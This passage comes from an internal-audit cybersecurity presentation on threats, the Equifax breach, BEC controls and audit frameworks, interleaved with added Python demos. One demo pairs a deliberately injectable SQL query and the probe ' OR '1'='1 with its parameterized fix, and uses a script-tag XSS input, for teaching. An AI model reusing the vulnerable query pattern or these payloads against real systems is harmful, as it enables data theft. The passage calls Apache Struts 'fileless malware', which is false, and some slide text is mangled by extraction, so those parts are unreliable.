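        acc = acceptance_for(row["host"], row["software"])
        if acc is None:
            status = "overdue"           # finding: nobody has accepted this risk
        elif acc["expires"] >= as_of:
            status = "accepted"          # tracked: review the compensating control
        else:
            status = "accepted-expired"  # finding: sign-off lapsed, patch still missing
    return {**row, "days_outstanding": days, "status": status}


def report(inventory=INVENTORY, as_of: date = AS_OF) -> dict:
    return {(r["host"], r["software"]): classify(r, as_of) for r in inventory}


if __name__ == "__main__":
    for (host, sw), r in report().items():
        print(f"{host:6s} {sw:18s} {r['days_outstanding']:4d} days  {r['status']}")
```

The two findings this produces are web02 (an internet-facing system 90 days behind with no acceptance on file) and fs01 (an acceptance that expired two months before the audit date); erp01 is not a finding by itself, but the auditor should still ask to see the network segmentation the acceptance relies on.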
CYBERSECURITY – SUMMARY QUICK-HIT LIST
Review at least the following for your company:
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected.
• Perform an inventory of IT devices and assess each device's risk relating to patches.
• Understand your company's fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems).
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval).
• Implement a continual end-user training program.
• Ensure backups and recovery plans work as intended and are properly segregated.
• Understand the coverage and terms of your company's cyber insurance policy.
• Assess the requirement for multi-factor authentication.
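The user and admin ID inventory from the list above, combined with the privileged-account tests from the "User and Administrator Level Access" slide, as an added example that is not part of the original presentation: a constructed account export is checked against a policy that holds privileged accounts to a higher standard (longer passwords, shorter rotation, MFA, no mailbox for daily tasks, no sharing, a named owner). The policy thresholds and the five accounts are assumptions made for the demo.

```python
"""Audit of a constructed user/admin account export against a password and
privilege policy. Added example: the thresholds and the export are assumptions."""
from dataclasses import dataclass

# Assumed policy: privileged accounts are held to a higher standard than normal ones.
POLICY = {
    "standard":   {"min_length": 12, "max_age_days": 180, "require_mfa": False},
    "privileged": {"min_length": 16, "max_age_days": 90,  "require_mfa": True},
}


@dataclass
class Account:
    user_id: str
    privileged: bool
    password_length: int
    password_age_days: int
    mfa_enabled: bool
    mailbox_enabled: bool   # a mailbox on an admin account means it is used for daily tasks
    shared: bool            # more than one person knows the password
    owner: str              # named individual accountable for the account


ACCOUNTS = [  # constructed export
    Account("jsmith", False, 14, 120, False, True, False, "J. Smith"),
    Account("adm-jsmith", True, 20, 30, True, False, False, "J. Smith"),
    Account("Administrator", True, 10, 400, False, False, True, ""),
    Account("svc-backup", True, 24, 800, False, False, False, "Backup team"),
    Account("adm-bjones", True, 18, 45, True, True, False, "B. Jones"),
]


def findings_for(acct: Account) -> list:
    tier = "privileged" if acct.privileged else "standard"
    rule = POLICY[tier]
    findings = []
    if acct.password_length < rule["min_length"]:
        findings.append(f"password shorter than {rule['min_length']} ({tier} policy)")
    if acct.password_age_days > rule["max_age_days"]:
        findings.append(f"password not changed in {acct.password_age_days} days "
                        f"(limit {rule['max_age_days']})")
    if rule["require_mfa"] and not acct.mfa_enabled:
        findings.append("privileged account without multi-factor authentication")
    if acct.privileged and acct.mailbox_enabled:
        findings.append("privileged account used for email (daily tasks)")
    if acct.shared:
        findings.append("shared password: no individual accountability")
    if acct.privileged and not acct.owner:
        findings.append("privileged account with no named owner")
    return findings


def audit(accounts=ACCOUNTS) -> dict:
    # One entry per account; an empty list means the account passed every test.
    return {a.user_id: findings_for(a) for a in accounts}


if __name__ == "__main__":
    for user, items in audit().items():
        print(user, "OK" if not items else "")
        for f in items:
            print("   -", f)
```

The built-in Administrator account collects five findings on its own, which is the usual result of this test in practice; the service account shows why "change frequency" needs a separate answer for non-interactive accounts, and adm-bjones shows that a strong password and MFA do not help if the admin account is also the one reading email.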
ANATOMY OF AN ATTACK
QUESTIONS
David Losacco, Principal – mobile (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates – stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
2
bull The comments and statements in this presentation are the opinions of the speaker and do not necessarily reflect the opinions or positions of Stinnett amp Associates LLC
bull This presentation is the property of Stinnett amp Associates LLC All rights reserved No part of this document may be reproduced transmitted or otherwise distributed in any form without written permission from Stinnett amp Associates LLC
bull Stinnett amp Associates LLC expressly disclaims any liability in connection with the use of this presentation or its contents by any third party
DISCLAIMER
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitions
bull What are some emerging cybersecurity trends and threats
bull What happened with some recent high-profile cybersecurity attacks
bull What are some cybersecurity roadblocks
bull What steps can Internal Audit take to evaluate your companyrsquos cybersecurity risk level
bull What can a Non-Technical Auditor do to evaluate your companyrsquos cybersecurity health
LEARNING OBJECTIVES
3
4
INTRODUCTION TO A CYBER CRIMINAL
5
WHAT DO ALL THESE COMPANIES HAVE IN COMMON
6
hellip AND THESE
7
List of Recent headlines
8
AS AUDITORS WHY DO WE CARE
Sources 2018 Global Megatrends in Cybersecurity
bull 51 of data breaches are caused by Organized Cyber Crime 18 are caused by Nation-States
bull 70 of cyber attacks and data breaches go undetected
bull 69 of organizations learn of their breach from an outside entity such as law enforcement customers or suppliers
bull In 2017 there were over 130 large-scale targeted breaches in the US per year and that number is growing by 27 percent per year
bull Small and mid-size businesses make up 43 of cyber crime targets
bull Cyber Crime costs estimated to reach $6 Trillion by 2021
bull 77 of organizations do not have a formal Cybersecurity Incident Response Plan
bull 147900000 consumer records impacted by Equifax breach in 2017 US Population is 327 Million
bull In 1st Quarter of 2017 60 of malware payloads were ransomware By the end of 2018 ransomwareaccounted for only 5 of malware
bull ldquoFilelessrdquo malware attacks increased 432 in 2017
bull Cyrptojacking attacks increased 8500 in 2017
Security compromises are a persistent business risk
9
THEY WANT OUR MONEY
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2017 Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information (PII) is worth more on the black market (ldquoThe Dark Webrdquo) than Credit Card Numbers
bull Ransomware payments estimated over $1 billion in 2017 70 of all Ransomware was paid
bull Email scams cost businesses over $12 Billion in 2018
bull 10 of laundered money is attributable to cyber crime That number is $200 Billion
Source Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing:
• Server attacks, once at 50%, are trending down
• User device and person attacks are both trending upward at nearly the same pace due to malware, ransomware and phishing attacks

COMMON TERMS AND DEFINITIONS
Information Technology (IT) – The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise; the department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things – A computing concept that describes the idea of everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
ATTACKS IN THE HEADLINES
https://www.businessinsider.com/hackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
https://jsis.washington.edu/news/cyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
COMMON TERMS AND DEFINITIONS
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices), each of which is running one or more bots after being infected with malware. Botnets can be used to perform Distributed Denial of Service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DoS) and Distributed Denial of Service (DDoS) – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A Distributed DoS is the same as a DoS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected and part of a botnet.
ATTACKS IN THE HEADLINES
https://www.csoonline.com/article/3258748/the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internet.html
https://www.wired.com/story/reaper-iot-botnet-infected-million-networks
COMMON TERMS AND DEFINITIONS
Middleware – Software that facilitates the exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack in which the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to alter or obtain data for themselves while unknown to the other two parties.
SQL Injection and Cross-site Scripting Attacks – An attack in which the attacker injects malicious code into a website. In SQL Injection the attacker uses the SQL language to obtain information back from the website that was unintended. In Cross-site Scripting the attacker injects code that only impacts other users of the website.
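The SQL injection and cross-site scripting definitions above, shown as an added example that is not part of the presentation: a query built by pasting user input into the SQL text beside its parameterized form, and HTML escaping of user text before it is rendered. The in-memory SQLite table and the customer rows are constructed for the demo; only the Python standard library is used.

```python
"""Added example (not from the presentation): an SQL query built by string
concatenation beside a parameterized query, plus HTML escaping as the basic
defense against cross-site scripting. The SQLite table and rows below are
constructed sample data."""
import html
import sqlite3


def build_db() -> sqlite3.Connection:
    """Create an in-memory customer table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO customers VALUES (?, ?)",
        [("Alice Example", "alice@example.test"),
         ("Bob Example", "bob@example.test")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable form: the user's input becomes part of the SQL text, so
    the input can change what the query means (SQL injection)."""
    sql = f"SELECT name, email FROM customers WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Hardened form: the input is bound as a parameter, so the database
    only ever treats it as a value, never as SQL."""
    sql = "SELECT name, email FROM customers WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def render_comment(comment: str) -> str:
    """Escape user-supplied text before placing it in an HTML page, so
    that a comment containing markup is displayed rather than executed
    by other users' browsers (the cross-site scripting case)."""
    return f"<p>{html.escape(comment)}</p>"


if __name__ == "__main__":
    db = build_db()
    probe = "' OR '1'='1"   # the textbook string that turns a lookup into "match everything"
    print("vulnerable:", lookup_vulnerable(db, probe))   # every row comes back
    print("safe:      ", lookup_safe(db, probe))         # no customer has that literal name
    print(render_comment("<script>alert(1)</script>"))  # tags are rendered as text
```

The same probe string returns every customer from the concatenated query and nothing from the parameterized one, which is the whole difference an auditor needs to understand when asking developers whether queries are parameterized.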
ATTACKS IN THE HEADLINES
https://www.zdnet.com/article/man-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
https://krebsonsecurity.com/2018/09/secret-service-warns-of-surge-in-atm-wiretapping-attacks/comment-page-1
https://www.scmagazine.com/home/security-news/cisco-patches-prime-license-manager-sql-injection-vulnerability
https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – A catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware outbreaks and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is a version of malware that has been in the headlines
• Malware can grant command and control of a device to the hackers
• 1 in 131 emails contained malware in 2016
• "Fileless" malware is a new variant that is more difficult to detect
COMPLEXITY BEHIND THE EQUIFAX ATTACK
• Attack started early March 2017 with hackers using a bot programmed to search the web for a recently released CVE (Common Vulnerability and Exposure)
• It took the hackers two months before they found the vulnerability on one of Equifax's websites used to help customers with claims
• Hackers then used another vulnerability (a fileless malware named Apache Struts) that was also a CVE that had been issued a month before but never fixed
• Hackers spent an estimated 76 days in the network and downloaded records from 51 different databases
• Over 148 million records were stolen
• Attack was not identified until July 30, 2017
EQUIFAX – WHAT WAS LOST
In addition to US consumers, the UK Data Protection Authority, the Information Commissioner's Office, reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving license numbers exposed
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed
• Up to 15 million UK data subjects had names and dates of birth exposed
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software, such as TOR (The Onion Router), that helps keep users anonymous. Darknet sites are used for several illegal activities, such as black market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that – along with all Bitcoin transactions – is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process – that is, the amount of computing power involved – increases.
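The "computationally difficult puzzle" in the Bitcoin definition, as an added toy example that is not part of the presentation and not Bitcoin's real block format: a miner searches for a nonce whose SHA-256 hash with the block header has a required number of leading zero bits, and anyone can verify the answer with a single hash. The header string and difficulty values are constructed for the demo; each extra bit of difficulty roughly doubles the expected number of attempts, which is the mechanism by which mining cost rises.

```python
"""Added example (not from the presentation): a toy proof-of-work search of
the kind the Bitcoin definition describes. The block header is a constructed
string, not a real Bitcoin block; the target is "at least `difficulty`
leading zero bits in SHA-256(header || nonce)"."""
import hashlib


def leading_zero_bits(digest: bytes) -> int:
    """Number of leading zero bits in a 32-byte SHA-256 digest."""
    return 256 - int.from_bytes(digest, "big").bit_length()


def mine(block_header: str, difficulty: int, max_attempts: int = 5_000_000):
    """Search nonces 0, 1, 2, ... for one meeting the target.

    Returns (nonce, attempts) or None if max_attempts is exhausted. Finding
    the nonce is the expensive part: on average about 2**difficulty hashes."""
    for nonce in range(max_attempts):
        digest = hashlib.sha256(f"{block_header}{nonce}".encode()).digest()
        if leading_zero_bits(digest) >= difficulty:
            return nonce, nonce + 1
    return None


def verify(block_header: str, nonce: int, difficulty: int) -> bool:
    """Checking a claimed solution costs one hash, however hard it was to find."""
    digest = hashlib.sha256(f"{block_header}{nonce}".encode()).digest()
    return leading_zero_bits(digest) >= difficulty


if __name__ == "__main__":
    header = "constructed-block-header"   # constructed stand-in for a block header
    for difficulty in (8, 12, 16):
        nonce, attempts = mine(header, difficulty)
        print(f"difficulty {difficulty:2d} bits: nonce={nonce:6d} "
              f"after {attempts:6d} attempts, valid={verify(header, nonce, difficulty)}")
```

Running it shows attempts growing by roughly a factor of 16 for every four extra bits, while the verification cost stays constant; that asymmetry is what makes the ledger expensive to rewrite and cheap to audit.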
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• The use of BITCOINS is typically the payment method
• Ransomware attacks were growing at a rate of 350% annually until 2017 and have now dropped but are still present (HR and healthcare companies, both in February)
• The WannaCry ransomware attack impacted over 200,000 people across 150 countries (included a worm)
RANSOMWARE
Ransomware-as-a-Service (RaaS) allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS handles the ransom payments. The RaaS developer takes a cut of any payments that are made, and will also reduce their cut depending on the volume of payments received.
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts and impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain money or sensitive information from the company, its business partners and/or employees
• The FBI's Internet Crime Complaint Center, or IC3, said that based on fraud reports submitted from October 2013 to May 2018 there were 41,058 total US victims of BEC schemes, which collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion)
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a "highly unusual action" by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
  • All nine lost at least $1 Million due to the BEC scam
  • Two companies lost more than $30 Million each
  • In total the nine issuers lost almost $100 Million
BEC & PHISHING
Phishing – A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
Spear Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing data (IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING EMAIL EXAMPLE
Most companies battle the increased phishing and spear-phishing attacks by labeling each external email with some form of the following inserts.
This "band-aid" is still widely in practice today, however.
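The external-email label and the "CEO email to Treasurer" pattern from the BEC and phishing slides, as an added example that is not from the presentation: a small mail-flow check that tags the subject of any message from outside the company's own domains, and that flags a message whose display name matches an executive but whose address does not (or whose Reply-To points elsewhere). The internal domain, the executive list and the two sample messages are constructed for the demo; the parsing uses only the standard library `email` module.

```python
"""Added example (not from the presentation): header checks of the kind a
mail gateway applies to label external senders and to spot executive
impersonation. Domains, executives and the two messages are constructed."""
from email import message_from_string
from email.utils import parseaddr

INTERNAL_DOMAINS = {"example-corp.test"}                       # constructed
EXECUTIVES = {"jane ceo": "jane.ceo@example-corp.test"}        # constructed: display name -> real address
EXTERNAL_TAG = "[EXTERNAL]"

# Constructed sample messages (raw RFC 822 text).
INTERNAL_MESSAGE = """From: Pat Treasurer <pat.treasurer@example-corp.test>
To: ap@example-corp.test
Subject: March vendor payments

Please process the attached schedule.
"""

SPOOFED_MESSAGE = """From: Jane Ceo <jane.ceo.office@webmail-example.test>
Reply-To: finance-desk@webmail-example.test
To: pat.treasurer@example-corp.test
Subject: Urgent wire needed today

I am in meetings all day, please wire the vendor and confirm.
"""


def classify(raw_message: str) -> dict:
    """Parse the headers and return the tagged subject plus a list of flags."""
    msg = message_from_string(raw_message)
    display, addr = parseaddr(msg.get("From", ""))
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    external = domain not in INTERNAL_DOMAINS
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))

    flags = []
    if external:
        flags.append("external-sender")
    # Display name matches a known executive but the address is not theirs.
    name_key = " ".join(display.lower().split())
    if name_key in EXECUTIVES and addr.lower() != EXECUTIVES[name_key]:
        flags.append("executive-display-name-mismatch")
    # Replies would go somewhere other than the visible sender.
    if reply_addr and reply_addr.lower() != addr.lower():
        flags.append("reply-to-differs")

    subject = msg.get("Subject", "")
    if external and not subject.startswith(EXTERNAL_TAG):
        subject = f"{EXTERNAL_TAG} {subject}"
    return {"from": addr, "external": external, "subject": subject, "flags": flags}


if __name__ == "__main__":
    for raw in (INTERNAL_MESSAGE, SPOOFED_MESSAGE):
        print(classify(raw))
```

The subject tag is the banner the slide describes; the two extra flags are what lets a reviewer or a rule route the message for a second look rather than relying on the recipient noticing the banner.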
BEC & OFFICE 365
• Office 365 is Microsoft's cloud-based solution offering everything from email and Excel to cloud storage
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies
• 20% of all companies use Office 365
• Office 365 overtook Office products in the 4th quarter of 2017 as the largest revenue stream for Microsoft
• Most companies do not correctly set up Office 365 security or logging
• Significant increase in attack vectors against Office 365
• It only takes one employee and the hacker is internal to email and Office 365
• Some attack vectors do not require a phishing email
BEC ATTACK WALKTHROUGH
BEC – PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash

Cash Receipts
• Review of balances over 60 days and $10k – a triggered review and communication uncovered a change in bank info (communication was being sent to a deleted email)
• Reports that generate overdue receivables timely for follow-up
• Escalation rules for overdue receivables

Cash Disbursements
• SOD – limit access to the vendor master file
• Controls related to changing bank info for all vendors – need more than email communication; personal verification with the vendor requesting the change
• Vendor set-up – verification of information provided
• ISNetworld – vetting process for vendors; could require vetting prior to set-up as vendors
• ACH debits – no reason to give debit access to the account; if done, dual approval and a ZBA should be used
• Multi-factor authentication

Other Processes to Consider
• Treasury
• Payroll
• Royalties
• SOX Impact
• Cyber Insurance
• Legal Liabilities
• Contract Language
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of passwords and one-time codes
• Office 365 and other cloud-based services should all use multi-factor authentication
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons for companies' struggles are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
DEFENSE IN-DEPTH APPROACH
A Defense-in-Depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail and integrates multiple layers of defense around a company's information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).

CYBERSECURITY DEFENSE IN-DEPTH
• Patch Management
• Operating System EOL
• Network Vulnerability Scanning
• Security Staffing
• Internal & External Network Boundaries
• Wireless Security
• Firewall Implementation and Monitoring (including NextGen)
• IPS / IDS / SIEM Implementations
• Firewall Dataflow & Standards Documentation
• Cloud Service Provider Evaluations
• Security Incident Management
• Physical Security
• Evaluation of Encryption Technologies
• Network Access Control
• Workstation Endpoint Protection

PEOPLE / PROCESSES / TECHNOLOGY
THE PEOPLE CHALLENGE – Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE – The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE – Ensure best practice processes and associated management frameworks are in place. Regular audits and reviews are important.
WHERE AUDIT CAN HELP
Step 1 - Identify risks through a formal risk assessment of assets
Step 2 - Perform a baseline gap analysis of the current control environment against industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
Cycle: Risk Assessments → Create a Baseline / Gap Analysis → Implement and Manage Controls → Assess & Report
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• Risk assessments should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-qualitatively measure cybersecurity risks, in order to identify, estimate and prioritize information security risks
Process: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results

STEP 1 - CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets:
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash in / cash out processes
• Who would want the data?
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
Example screenshot of a critical data asset risk assessment
STEP 2 - BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
• Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement, including the highest priority, most impactful controls that should be implemented first
STEP 3 - CONTROLS ANALYSIS
• The Baseline Gap Analysis facilitates the identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
• Work with IT management to identify realistic and feasible mitigating controls and an implementation roadmap
[Chart: Mitigating Control Counts]
A) Identify information systems with calculated cybersecurity risk > 100
B) Does the information system have a SPECIFIC THREAT cybersecurity risk over 100 (Yes/No)? If yes, move to the next step
C) Identify mitigating controls to implement to mitigate the threat
D) Total all instances where controls reduced risk
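The semi-qualitative threat modeling of Step 1 and the control-count procedure of Step 3 (steps A to D), carried through in an added example that is not the presenter's tool: each asset gets a value rating from the classification step, each asset/threat pair gets likelihood and impact ratings, risk is the product, and the "mitigating control counts" are the number of over-threshold pairs each control mitigates. The assets, ratings, threat names and the threat-to-control map are constructed for the demo; the control names are taken from the defense-in-depth list.

```python
"""Added example (not the presenter's tool): a small semi-quantitative risk
model. risk = asset value (1-10) x likelihood (1-5) x impact (1-5), with the
slide's threshold of 100. All inventory and rating values are constructed."""
from collections import Counter

RISK_THRESHOLD = 100

# Constructed asset inventory: value rating from the classification step.
ASSETS = {
    "payroll-db": 10,
    "ap-vendor-master": 9,
    "public-website": 4,
    "engineering-share": 7,
}

# Constructed threat ratings per asset: (likelihood 1-5, impact 1-5).
THREAT_RATINGS = {
    ("payroll-db", "ransomware"): (4, 5),
    ("payroll-db", "unpatched-vulnerability"): (3, 5),
    ("ap-vendor-master", "business-email-compromise"): (4, 5),
    ("ap-vendor-master", "ransomware"): (2, 4),
    ("public-website", "sql-injection"): (4, 3),
    ("public-website", "ddos"): (3, 2),
    ("engineering-share", "ransomware"): (3, 4),
    ("engineering-share", "phishing-malware"): (4, 4),
}

# Constructed mapping of each threat to the controls that reduce it.
MITIGATING_CONTROLS = {
    "ransomware": ["Patch Management", "Workstation Endpoint Protection", "Backups and Recovery"],
    "unpatched-vulnerability": ["Patch Management", "Network Vulnerability Scanning"],
    "business-email-compromise": ["Multi-factor Authentication", "Security Awareness Training",
                                  "Vendor Bank Change Verification"],
    "sql-injection": ["Network Vulnerability Scanning", "Patch Management"],
    "ddos": ["Firewall Implementation and Monitoring"],
    "phishing-malware": ["Security Awareness Training", "Workstation Endpoint Protection"],
}


def risk_score(asset: str, threat: str) -> int:
    """Step 1: value x likelihood x impact for one asset/threat pair."""
    likelihood, impact = THREAT_RATINGS[(asset, threat)]
    return ASSETS[asset] * likelihood * impact


def calculated_risks() -> list:
    """Step 1 output: every (asset, threat, score), highest risk first."""
    rows = [(a, t, risk_score(a, t)) for (a, t) in THREAT_RATINGS]
    return sorted(rows, key=lambda r: r[2], reverse=True)


def systems_over_threshold(threshold: int = RISK_THRESHOLD) -> list:
    """Step 3A: information systems with any threat scoring above the threshold."""
    return sorted({a for a, _, s in calculated_risks() if s > threshold})


def threats_over_threshold(threshold: int = RISK_THRESHOLD) -> list:
    """Step 3B: the specific (asset, threat) pairs that exceed the threshold."""
    return [(a, t) for a, t, s in calculated_risks() if s > threshold]


def control_counts(threshold: int = RISK_THRESHOLD) -> Counter:
    """Steps 3C and 3D: how many over-threshold pairs each control mitigates.
    Controls with the highest counts reduce the most risk across assets."""
    counts = Counter()
    for _, threat in threats_over_threshold(threshold):
        counts.update(MITIGATING_CONTROLS[threat])
    return counts


if __name__ == "__main__":
    for asset, threat, score in calculated_risks():
        print(f"{score:4d}  {asset:18s} {threat}")
    print("systems over threshold:", systems_over_threshold())
    for control, n in control_counts().most_common():
        print(f"{n:2d}  {control}")
```

The control counts are what the slide's bar chart summarizes: a control that appears against several high-risk pairs (here patch management, endpoint protection and awareness training) is the one to put first on the implementation roadmap.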
STEP 4 - CYBERSECURITY REPORTING
• Leverage information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly SANS Top 20)
International Organization for Standardization
• ISO 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%) – Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization and 44% use more than one framework – Source: itgovernanceusa.com

CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
